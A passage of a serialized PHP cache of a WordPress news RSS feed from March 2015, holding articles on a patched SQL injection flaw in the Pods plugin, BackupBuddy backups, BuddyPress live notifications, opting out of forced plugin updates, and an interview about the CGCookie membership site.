Vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40651\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wptavern.com/pods-framework-security-release-fixes-severe-vulnerability\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3704:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/pods.jpg\" rel=\"prettyphoto[40651]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/pods.jpg?resize=628%2C290\" alt=\"pods\" class=\"aligncenter size-full wp-image-40653\" /></a></p>\n<p>Last week <a href=\"http://wptavern.com/blind-sql-injection-vulnerability-discovered-in-wordpress-seo-plugin-by-yoast-immediate-update-recommended\">a blind SQL injection vulnerability</a> was discovered in Yoast’s popular WordPress SEO plugin. Given the severity of the vulnerability and the fact that the plugin is installed on more than one million WordPress sites, the security team at WordPress.org pushed <a href=\"http://wptavern.com/how-to-stay-in-the-loop-if-you-turn-off-wordpress-automatic-updates\" target=\"_blank\">a forced update</a> to mitigate the possibility of mass exploitation.</p>\n<p>Following this incident, the <a href=\"http://pods.io/\" target=\"_blank\">Pods framework</a> team proactively performed a security review of their <a href=\"https://wordpress.org/plugins/pods/\" target=\"_blank\">plugin</a> and found an issue similar to the one discovered and disclosed last week in the WordPress SEO plugin. Contributor Josh Pollock describes the issue in the <a href=\"http://pods.io/2015/03/16/important-security-disclosure/\" target=\"_blank\">release announcement</a>:</p>\n<blockquote><p>We believe this is an especially severe issue as this issue occurred in the PodsUI class, which is not only used for the Pods admin, but is also employed by many end-users to create front-end and back-end content management interfaces for non-admin users.</p>\n<p>The issue occurred in approximately Line 859 of the PodsUI class. The orderby parameter, which is passed from the browser in a GET variable was subsequently used in an SQL query without being properly sanitized.</p>\n<p>As a result malicious or other unintended SQL queries could be sent to the database by manipulating the GET request.</p></blockquote>\n<p>Pods 2.5.1.2, released today, is a security update that patches this vulnerability. If you require an earlier version of the plugin, patched versions of older versions are available the <a href=\"https://wordpress.org/plugins/pods/developers/\" target=\"_blank\">releases page</a>. All users are advised to update immediately.</p>\n<p>The Pods framework is used for creating, managing, and deploying customized content types and fields. It’s active on more than 30,000 WordPress installations. Contributors on the project credit Yoast’s transparency on the recent security issue as having inspired their team to proactively examine Pods.</p>\n<p>“Reading the details of their issue led us to search for similar security issues in Pods,” Pollock said. “We applaud their responsible disclosure to the community. Publishing the details helps other developers work to improve security in their own codebase.”</p>\n<h3>More Security Updates on the Way for Popular WordPress Plugins</h3>\n<p>All relatively complex plugins will have security issues pop up from time to time that will require immediate patching. Fortunately, the plugin authors in these scenarios have been quick to respond.</p>\n<p>This particular vulnerability is not limited to Pods and the WordPress SEO plugin by Yoast. Pollock advises that WordPress users should be on the lookout for more security updates to follow for other popular plugins.</p>\n<p>“Our team has done a search in several other plugins for similar issues and has reported our findings to their authors,” he said. “At this time we can not share specifics about theses issues, but will as soon as it is responsible to do so.”</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 Mar 2015 18:17:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Alex King: In Praise of BackupBuddy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://alexking.org/?p=21405\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://alexking.org/blog/2015/03/15/backupbuddy\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1571:\"<p>I’m thrilled with my <a href=\"https://alexking.org/blog/2015/02/25/hosted-on-webfaction\">new hosting set-up</a> for this site, however WebFaction doesn’t offer daily backups. I knew could spend the time to write a little script to export my database and pass it along to another storage location, but then I thought of <a href=\"https://ithemes.com/purchase/backupbuddy/\">BackupBuddy from iThemes</a>.</p>\n<p>5 minutes later I had BackupBuddy installed, with a nightly job configured to do a full export of my database and store the last 10 days of backups in my Dropbox account.</p>\n<p>Sure, I could have written the code to do this myself. It’s always tempting to do-it-yourself when you know you <em>can</em> do something. The key is to ask yourself if you <em>should</em> do something. It would have taken much more than 5 minutes to get even a simple backup script written and configured; and I definitely wouldn’t have had the storage and and automation options that BackupBuddy provides out of the box.</p>\n<p>If you need hassle-free backups for your self-hosted WordPress site<sup id=\"fnref:1\"><a href=\"http://alexking.org/blog/topic/wordpress/feed#fn:1\" rel=\"footnote\">1</a></sup>, give BackupBuddy a try.</p>\n<div class=\"footnotes\">\n<hr />\n<ol>\n<li id=\"fn:1\">\nIf you have a website, <em>please</em> make sure you have an automated backup system, and that you’ve tested your backups to make sure they actually work. <a href=\"http://alexking.org/blog/topic/wordpress/feed#fnref:1\" rev=\"footnote\">↩</a>\n</li>\n</ol>\n</div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 15 Mar 2015 20:05:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Alex\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Live in the Moment\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44759\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://ma.tt/2015/03/live-in-the-moment/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:369:\"<p>Jenna Wortham writes on <a href=\"http://bits.blogs.nytimes.com/2014/10/18/trying-to-live-in-the-moment-and-not-on-the-phone/\">Trying to Live in the Moment (and Not on the Phone)</a>. I’ve been using the Moment app recently too, <a href=\"https://cloudup.com/cSfRDLJHDiv\">here’s my past week of usage</a>. (I think it might count phone calls as usage.)</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 15 Mar 2015 18:45:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"Matt: Series A Struggle\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44853\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/03/raising-series-a/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:312:\"<p><a href=\"http://firstround.com/review/what-the-seed-funding-boom-means-for-raising-a-series-a/\">Josh Kopelman on why raising a Series A is harder than ever, and how startups can adapt to survive the changing investment landscape</a>. Fantastic essay, relevant for every company raising money at any stage.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 14 Mar 2015 20:45:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WPTavern: BuddyPress Live Notification 2.0 Adds Real-Time Notifications for Users\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40500\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"http://wptavern.com/buddypress-live-notification-2-0-adds-real-time-notifications-for-users\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3787:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/08/megaphone.jpg\" rel=\"prettyphoto[40500]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/08/megaphone.jpg?resize=1024%2C484\" alt=\"photo credit: MACSwriter - cc\" class=\"size-full wp-image-28480\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/88758069@N08/8445004895/\">MACSwriter</a> – <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>The <a href=\"https://wordpress.org/plugins/bp-live-notification/\">BuddyPress Live Notification</a> plugin was originally released in 2011. Brajesh Singh, prolific plugin author and founder of <a href=\"http://buddydev.com/\" target=\"_blank\">BuddyDev</a>, created the plugin to provide Facebook-style real-time notifications for users. Over the past four years, a number of significant changes in both WordPress and BuddyPress have necessitated a complete rewrite of the extension.</p>\n<p>The <a href=\"http://buddydev.com/buddypress/introducing-buddypress-live-notification-2-0/\" target=\"_blank\">2.0 version</a> of the plugin adds support for BuddyPress’ new <a href=\"http://wptavern.com/buddypress-1-9-sammy-released-with-new-notifications-component\" target=\"_blank\">notifications component</a>, as well as the <a href=\"http://codex.wordpress.org/Function_Reference/wp_heartbeat_settings\" target=\"_blank\">Heartbeat API</a>, which is now used to fetch the notifications.</p>\n<p>The updated version includes the following:</p>\n<ul>\n<li>Complete rewrite of the code to include support for BP notifications component (introduced in BuddyPress 1.9.0)</li>\n<li>Uses WordPress Heartbeat API instead of long AJAX polling for greatly improved performance</li>\n<li>Allows theme authors to change the notifying mechanism by overriding the notify method of the bpln object</li>\n<li>Fires custom JavaScript event bpln:new_notifications when new notifications are received on the client side. A theme author can hook into it to make modifications.</li>\n</ul>\n<p>Because BP Live Notification was designed to be easy to theme and extend, Singh created an <a href=\"https://github.com/sbrajesh/bp-live-notification-example-module\" target=\"_blank\">example plugin</a> to demonstrate how to replace the notify window UI with your own customization.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/jquery-notice-style.png\" rel=\"prettyphoto[40500]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/03/jquery-notice-style.png?resize=449%2C250\" alt=\"jquery-notice-style\" class=\"aligncenter size-full wp-image-40617\" /></a></p>\n<p>The sample plugin repackages the notification window with the <a href=\"https://github.com/sbrajesh/bp-live-notification-example-module/tree/master/assets/notify\" target=\"_blank\">jQuery notice plugin</a>. Check out a <a href=\"http://creativedream.net/plugins/jquery.notify/\" target=\"_blank\">live demo</a> to see how that style of notice is presented.</p>\n<p>If you don’t like how BP Live Notification styles its alerts by default, you can easily integrate a different jQuery notice plugin using the example Singh posted on GitHub. Searching the web will turn up a <a href=\"http://jqueryhouse.com/best-jquery-notification-plugins/\" target=\"_blank\">wide variety</a> of beautiful notification styles that you can adapt for use with BuddyPress.</p>\n<p>Both Twitter and Facebook use live notifications to keep users interacting on their social networks. When you receive a live notice, it confirms, in an almost tangible way, that you are at the center of where the social activity is happening. If you think this would benefit your BuddyPress network, download <a href=\"https://wordpress.org/plugins/bp-live-notification/\">BP Live Notification</a> 2.0 for free from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 14 Mar 2015 02:07:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"WPTavern: How to Stay in the Loop if You Turn Off WordPress’ Automatic Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=40498\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/how-to-stay-in-the-loop-if-you-turn-off-wordpress-automatic-updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5514:\"<p>When a critical <a href=\"http://wptavern.com/blind-sql-injection-vulnerability-discovered-in-wordpress-seo-plugin-by-yoast-immediate-update-recommended\" target=\"_blank\">security vulnerability was discovered in Yoast’s SEO plugin</a> this week, WordPress.org took the initiative to automatically update users’ sites with the patched version of the plugin. Many users were taken by surprise, given that the WordPress codex clearly stated that automatic plugin and theme updates are disabled by default.</p>\n<p>Shortly after the automatic update rolled out, the <a href=\"http://codex.wordpress.org/Configuring_Automatic_Background_Updates\" target=\"_blank\">codex page</a> was updated to reflect the fact that in rare instances WordPress.org will automatically update your plugins and themes unless you opt to turn this feature off entirely. Many users are not comfortable with forced automatic updates, but the good news is that there is a filter to turn them off, including the WordPress.org security updates for popular plugins:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">add_filter( \'auto_update_plugin\', \'__return_false\' );</pre>\n<p>Prior to this security issue, users were not aware that they had to opt out of these forced updates. On one side of the fence there are those who think it’s no big deal and are thankful that WordPress.org is proactive on behalf of user security.</p>\n<p>On the other hand, there are those who are wary of forced updates from plugin authors who are notorious for pushing out problematic updates. The <a href=\"https://wordpress.org/support/plugin/wordpress-seo\">support forum</a> for Yoast’s SEO plugin contains many threads regarding fatal errors following updates issued in the past.</p>\n<p>In this particular case, Nick Haskins <a href=\"http://nickhaskins.com/2015/03/on-automatic-wordpress-updates/\" target=\"_blank\">summarizes</a> why he was not comfortable with WordPress.org’s forced update:</p>\n<blockquote><p>The plugin in question is Yoast WordPress SEO. If you’re not familiar with his plugins, the history of updates is awful. In the last two weeks, I’ve updated twice, and both times have resulted in fatal PHP errors which require FTP’ing into the site, to manually remove the plugin. Both cases were due to not checking if a file exists before loading it.</p></blockquote>\n<p>Those who are not comfortable with WordPress.org’s forced update policy have the option to turn updates off for particular plugins or for all plugins. If you opt to go the route of turning automatic updates off, there are alternative ways that you can stay up-to-date on plugin releases.</p>\n<h3>Get Email Notices When Core, Plugin, and Theme Updates are Available</h3>\n<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/air-mail.jpg\" rel=\"prettyphoto[40498]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/03/air-mail.jpg?resize=1018%2C494\" alt=\"photo credit: Par avion - (license)\" class=\"size-full wp-image-40600\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/79016591@N07/13204207393\">Par avion</a> – <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">(license)</a>\n<p>No site admin can realistically be expected to log into his site(s) and check for update every day, let alone follow all the news surrounding plugin and theme security issues. The <a href=\"https://wordpress.org/plugins/wp-updates-notifier/\" target=\"_blank\">WP Updates Notifier</a> plugin will monitor your WordPress installation for updates and will send you an email as they become available. It includes the following features:</p>\n<ul>\n<li>Set the interval of how often to check for updates; hourly, twice daily or daily.</li>\n<li>Sets WordPress to check for updates more often meaning you get to know about updates sooner.</li>\n<li>Get emailed about core, plugin and theme updates.</li>\n<li>Chose if you want to be notified about active only themes and plugins updates.</li>\n<li>Remove upgrade nag message to non-admin users.</li>\n<li>For advanced users there are a number of filters and actions you can use.</li>\n</ul>\n<p>It would be truly awesome if WP Updates Notifier was also able to scan a plugin’s changelog for the word “Security” and tack it onto the email if it is applicable.</p>\n<p>WP Updates Notifier can be useful even if you’re comfortable allowing WordPress.org to perform occasional forced updates to themes and plugins for security. You may be using a plugin that is not nearly popular enough meet the criteria for a forced automatic update. Regardless, it may be useful for you to know as soon as there is an update available.</p>\n<p>The important thing is to stay in the loop about potential security issues and get patches as soon as they are available. <a href=\"https://wordpress.org/plugins/wp-updates-notifier/\" target=\"_blank\">WP Updates Notifier</a> lets you do that without having to allow any third party update core, plugins, or themes on your server. The plugin is most useful when you have only a handful of sites or fewer. Otherwise, it’s probably better to utilize a central dashboard service where you check in regularly to see updates across all of your sites at once.</p>\n<p>Your other alternative is to ditch plugins created by authors who you cannot trust to issue clean updates. That will put you in a better position to leave automatic background updates on, which is recommended for the vast majority of WordPress users.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 13 Mar 2015 19:38:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"Post Status: Running a successful membership site in real life, with Jonathan Williamson\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=7208\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"https://poststatus.com/running-a-wordpress-membership-website-jonathan-williamson/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:12427:\"<p>Jonathan Williamson is the co-founder and COO of <a href=\"http://cgcookie.com/\">CGCookie</a>, a membership website that provides as an educational resource for computer graphics and modeling. CGCookie has been around since 2008, and today is a network of five websites, has thousands of paying members, a team of six full time employees plus a number of contractors.</p>\n<p>CGCookie is built completely on WordPress and has a built in membership component. Some astute readers may recognize both the site and Jonathan’s name; Jonathan is <a href=\"https://twitter.com/pippinsplugins\">Pippin Williamson’s</a> identical twin brother, and Pippin has worked with Jonathan on CGCookie many times. So, in this interview, you’re not listening to me talk to Pippin — though it sounds like it — but I’m talking to Jonathan Williamson.</p>\n<p>Jonathan is as passionate about CG, modeling, 3D printing, and the software that surrounds these disciplines as Pippin is about WordPress and programming. It was a pleasure to talk to Jonathan about what it’s like to run a membership site that runs on WordPress. I think this interview will be beneficial for those that want to run a membership site, and also those that work with clients who make their living off of their website.</p>\n<p><!--[if lt IE 9]><script>document.createElement(\'audio\');</script><![endif]-->\n<a href=\"http://audio.simplecast.fm/9023.mp3\">http://audio.simplecast.fm/9023.mp3</a><br />\n<a href=\"http://audio.simplecast.fm/9023.mp3\">Direct Download</a></p>\n<p><a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">Or subscribe to the Post Status Draft podcast on iTunes!</a></p>\n<h3>How CGCookie evolved</h3>\n<p>CGCookie started as a blog with news, tutorials, and resources for CG enthusiasts. The first form of its monetization was by selling the source files for the various tutorials. Within about two years, Jonathan and co-founder Wes Burke decided to add a membership component that ended up working far better than they anticipated.</p>\n<p>Jonathan has been working full-time on CGCookie since around the summer of 2009. They originally launched on aMember, before eventually migrating to Pippin’s <a href=\"https://pippinsplugins.com/restrict-content-pro-premium-content-plugin/\">Restrict Content Pro</a> plugin, along with <a href=\"https://easydigitaldownloads.com/\">Easy Digital Downloads</a>.</p>\n<p>Today, CGCookie has more than 120,000 free users, and they have around 4,800 paid members.</p>\n<p>Since 2008, CGCookie have managed to not have a full time web developer until February of 2014, when they hired Nick Haskins. You may recognize Nick as the founder of <a title=\"Aesop, a Medium-esque “story engine” for WordPress\" href=\"https://poststatus.com/aesop-medium-esque-story-engine-wordpress/\">Aesop Stories</a> as well. Nick manages front-end development for the site, and they still don’t have a backend developer — though a backend developer and designer are on their roadmap.</p>\n<h3>How CGCookie’s eCommerce setup runs</h3>\n<p>Considering Jonathan is using his brother’s own plugins in the real world, it makes for a great avenue for feedback and insight for Pippin to improve those products.</p>\n<p>CGCookie is using Restrict Content Pro for <a href=\"https://cgcookie.com/membership/\">memberships</a> themselves, and EDD plus the <a href=\"https://easydigitaldownloads.com/extensions/frontend-submissions/\">Front-End Submissions</a> add-on for their <a href=\"http://cgcookiemarkets.com/blender/\">marketplace</a>. We talked about whether EDD could be used for both, or if there is room for improvement in the marriage between the two systems, and he believes there is and that it’s a goal for the two plugins. For instance, currently, reporting and user management and a number of other features are independent between each plugin even though often times the users that utilize the system may overlap.</p>\n<p>I asked Jonathan about scaling WordPress and eCommerce for their large user base. He says that scaling for eCommerce has not been difficult, but with over a hundred thousand users, some default WordPress functionality has not scaled well; for instance, some admin areas create dropdowns for all users, which does not work well. Fortunately, there are some trac tickets in place currently to help solve some of these problems.</p>\n<h3>Prioritizing goals for a membership site</h3>\n<p>When discussing challenges running a membership site, Jonathan highlights the internal battles: balancing new features versus iterative improvements. Based on my short experience managing this membership site, I completely agree.</p>\n<p>For an example, Jonathan told me about a potential question and answer system to help his members get answers for specific technical topics that may be beyond the scope of a specific course. They believe a Stack Exchange style setup that allows them to refer their courses to specific questions would allow them to better serve their customers with the same content they already have.</p>\n<blockquote><p>How do you get people to find your content that answers their question, but you don’t have a way of just explicitly saying that these are the questions this course answers?</p></blockquote>\n<p>They’re considering a method of post to post relationships that direct courses as question answers and vice versa. For this feature and others, they try to do things with a short return on investment, but they also don’t want to be a slave to it. They sometimes do things “that are important to the quality of CGCookie, that never make a dime.” They removed ads last year under that very premise, to make CGCookie a better learning experience.</p>\n<h3>Not the only place to learn</h3>\n<p>Jonathan knows CGCookie isn’t the only place to learn, so they focus on creating an excellent community and learning experience for their customers.</p>\n<p>Realizing that our sites aren’t the only way to get certain information is an important thing to know to be able to better focus what we create for our users and why we create it.</p>\n<h3>Pricing for CGCookie</h3>\n<p>CGCookie has pricing for monthly, quarterly, or yearly pricing; all plans renew automatically unless explicitly cancelled. This is a feature they actively A/B test to see what’s working and what’s not.</p>\n<p>Behavior of customers varies between the three levels. Jonathan says that the users are more invested in their purchases (and getting more out of it) when they sign up for longer. Quarterly members have 10% longer lifetime memberships and spend three times longer on the site.</p>\n<p>However, they do have “a fair bit” of what I called “download and dash” members that sign up for a month, download a bunch of assets and cancel. Monthly memberships are also the most popular plan. They’ve considered locking down downloads for monthly signups but it’s not something they want to do unless it becomes a bigger problem; however they do lose money on those customers that download gigabytes of files and videos but only stay subscribed for one month.</p>\n<h3>Testing</h3>\n<p>During A/B tests, they have found that people will be just as likely to sign up for quarterly as monthly if monthly isn’t available, and quarterly members are more engaged. One thing they noted is that once people stick around for a few months, the average tenure of a user skyrockets; they have some users that have been a paying member as long as the site has been running.</p>\n<p>One of my big takeaways talking to Jonathan was about how significant testing can be. Their tests help them decide on the optimal pricing and payment plans to maximize a lifetime value.</p>\n<p>For testing, insights, and statistics they use <a href=\"https://www.optimizely.com/\">Optimizely</a>, <a href=\"https://mixpanel.com/\">Mixpanel</a>, and Google Analytics.</p>\n<p>Mixpanel allows you to create custom events in your software, and does 